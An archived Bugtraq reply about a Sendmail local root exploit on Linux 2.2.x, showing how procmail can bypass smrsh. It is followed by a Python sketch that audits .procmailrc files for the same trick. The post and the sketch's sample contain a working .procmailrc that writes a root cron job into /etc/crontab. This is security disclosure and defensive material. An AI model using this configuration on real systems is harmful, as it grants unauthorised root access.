[15324] in bugtraq
Re: Sendmail local root exploit on linux 2.2.x
daemon@ATHENA.MIT.EDU (Alan Iwi)
Wed Jun 14 15:32:20 2000
Message-Id: <20000612092814.10345.qmail@securityfocus.com>
Date: Mon, 12 Jun 2000 09:28:14 -0000
Reply-To: Alan Iwi <iwi@ATM.OX.AC.UK>
From: Alan Iwi <iwi@ATM.OX.AC.UK>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To: <393F8FDC.882BAEE5@real-linux.de>

> then create a .forward with:
> |/path/to/add

I tried this on an out-of-the-box Redhat 6.1 system.
In fact, on this system sendmail is configured to use
smrsh, which forbids piping mail to arbitrary programs
with .forward. But such systems are still vulnerable,
because sendmail is configured to run procmail. Just
change the exploit to use a .procmailrc file instead of
.forward. Here's an example:

LOGFILE=/etc/crontab
LOG="* * * * * root /tmp/my_dodgy_script.sh
"
LOGABSTRACT=no
:0
/dev/null

Alan
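
For administrators checking user accounts for the pattern in the message above, here is an added audit sketch (not part of the original post) that flags a .procmailrc whose LOGFILE resolves outside the owner's home directory or whose LOG text spans several lines. The function name, the /home/alice path and the /dev/null allowance are assumptions made for the example.

```python
import os
import re

# Constructed sample: the rc file shown in the post above.
SAMPLE_RC = '''LOGFILE=/etc/crontab
LOG="* * * * * root /tmp/my_dodgy_script.sh
"
LOGABSTRACT=no
:0
/dev/null
'''

ASSIGN = re.compile(r'^\s*(LOGFILE|LOG)\s*=\s*(.*)$')
HARMLESS = {"/dev/null"}  # assumption: log targets treated as acceptable anywhere

def audit_procmailrc(text, home):
    """Return (line_number, reason) findings for one .procmailrc (hypothetical helper)."""
    findings, lines, i = [], text.splitlines(), 0
    home = home.rstrip("/")
    while i < len(lines):
        m = ASSIGN.match(lines[i])
        if m:
            name, value, start = m.group(1), m.group(2), i + 1
            # A double-quoted value can continue over the following lines.
            while value.count('"') % 2 == 1 and i + 1 < len(lines):
                i += 1
                value += "\n" + lines[i]
            value = value.strip().strip("\"'")
            if name == "LOGFILE":
                path = value.replace("${HOME}", home).replace("$HOME", home)
                # Assumption: relative names resolve under the home directory.
                # normpath folds ".." but does not follow symlinks.
                path = os.path.normpath(os.path.join(home, path))
                if value and path not in HARMLESS and not path.startswith(home + "/"):
                    findings.append((start, "LOGFILE outside home: " + path))
            elif "\n" in value:
                findings.append((start, "multi-line LOG text"))
        i += 1
    return findings

if __name__ == "__main__":
    for lineno, reason in audit_procmailrc(SAMPLE_RC, "/home/alice"):
        print(f"line {lineno}: {reason}")
```
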